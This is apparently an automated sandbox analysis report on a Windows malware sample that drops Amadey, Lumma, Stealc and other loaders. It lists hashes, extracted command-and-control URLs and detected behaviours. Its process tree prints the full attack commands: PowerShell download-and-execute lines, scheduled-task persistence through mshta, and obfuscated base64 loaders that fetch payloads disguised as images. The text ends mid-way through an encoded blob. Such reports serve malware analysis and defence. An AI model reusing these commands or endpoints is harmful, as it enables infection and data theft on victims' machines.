Analysis

  • max time kernel
    144s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30/03/2025, 14:53

General

  • Target

    2025-03-30_fd21a7eb1fb3c59be7cac38ecaa11213_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    fd21a7eb1fb3c59be7cac38ecaa11213

  • SHA1

    fac587a2d542cba45bdfacabf96b76365cf6733f

  • SHA256

    968347c6a38e85cd7db48dbc60d7e49bd1181050a1984029d62a2f92dbb9ae35

  • SHA512

    6b3b1ac8077f23d3aded1934322608ddd6eac70d11cc01ad5787c90d17f73aa5b7a85f0ca698a4fc76a1266982f8a60ce1bef9f949ebc4e55ae13ba2085f2ee1

  • SSDEEP

    24576:mqDEvCTbMWu7rQYlBQcBiT6rprG8a0Vu:mTvC/MTQYxsWR7a0V

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://esccapewz.run/ANSbwqy

https://travewlio.shop/ZNxbHi

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://holidamyup.today/AOzkns

https://mtriplooqp.world/APowko

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 8 IoCs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 12 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 29 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SendNotifyMessage 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-30_fd21a7eb1fb3c59be7cac38ecaa11213_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-30_fd21a7eb1fb3c59be7cac38ecaa11213_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn 2R9anmaLSFm /tr "mshta C:\Users\Admin\AppData\Local\Temp\auOX2Qbz2.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2136
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn 2R9anmaLSFm /tr "mshta C:\Users\Admin\AppData\Local\Temp\auOX2Qbz2.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2684
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\auOX2Qbz2.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:3036
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'2CQAF9DHMCPUOXDJ0K2WB3FNBILQ8HI2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1988
        • C:\Users\Admin\AppData\Local\Temp2CQAF9DHMCPUOXDJ0K2WB3FNBILQ8HI2.EXE
          "C:\Users\Admin\AppData\Local\Temp2CQAF9DHMCPUOXDJ0K2WB3FNBILQ8HI2.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2468
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2804
            • C:\Users\Admin\AppData\Local\Temp\10382080101\929ec4f7b4.exe
              "C:\Users\Admin\AppData\Local\Temp\10382080101\929ec4f7b4.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2076
            • C:\Users\Admin\AppData\Local\Temp\10382090101\521a33822b.exe
              "C:\Users\Admin\AppData\Local\Temp\10382090101\521a33822b.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:852
            • C:\Users\Admin\AppData\Local\Temp\10382100101\6623817a91.exe
              "C:\Users\Admin\AppData\Local\Temp\10382100101\6623817a91.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:280
              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                "C:\Users\Admin\AppData\Local\Temp\10382100101\6623817a91.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1504
            • C:\Users\Admin\AppData\Local\Temp\10382110101\08d319ceb1.exe
              "C:\Users\Admin\AppData\Local\Temp\10382110101\08d319ceb1.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2460
              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                "C:\Users\Admin\AppData\Local\Temp\10382110101\08d319ceb1.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:708
            • C:\Users\Admin\AppData\Local\Temp\10382120101\dc7cb08b54.exe
              "C:\Users\Admin\AppData\Local\Temp\10382120101\dc7cb08b54.exe"
              6⤵
              • Executes dropped EXE
              PID:2444
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 2444 -s 64
                7⤵
                • Loads dropped DLL
                PID:1008
            • C:\Users\Admin\AppData\Local\Temp\10382130101\kO2IdCz.exe
              "C:\Users\Admin\AppData\Local\Temp\10382130101\kO2IdCz.exe"
              6⤵
              • Executes dropped EXE
              • Adds Run key to start application
              PID:2820
              • C:\Windows\system32\cmd.exe
                cmd.exe /c 67e8f4de3ad1d.vbs
                7⤵
                  PID:1744
                  • C:\Windows\System32\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e8f4de3ad1d.vbs"
                    8⤵
                      PID:444
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBi@G8@YQBl@GU@c@Bk@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@FI@ZQBn@EE@cwBt@Cc@L@@g@Cc@M@@n@Ck@KQB9@H0@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                        9⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3052
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.boaeepd/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                          10⤵
                          • Blocklisted process makes network request
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2440
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10382141121\5YB5L4K.cmd"
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2664
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10382141121\5YB5L4K.cmd"
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:668
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4e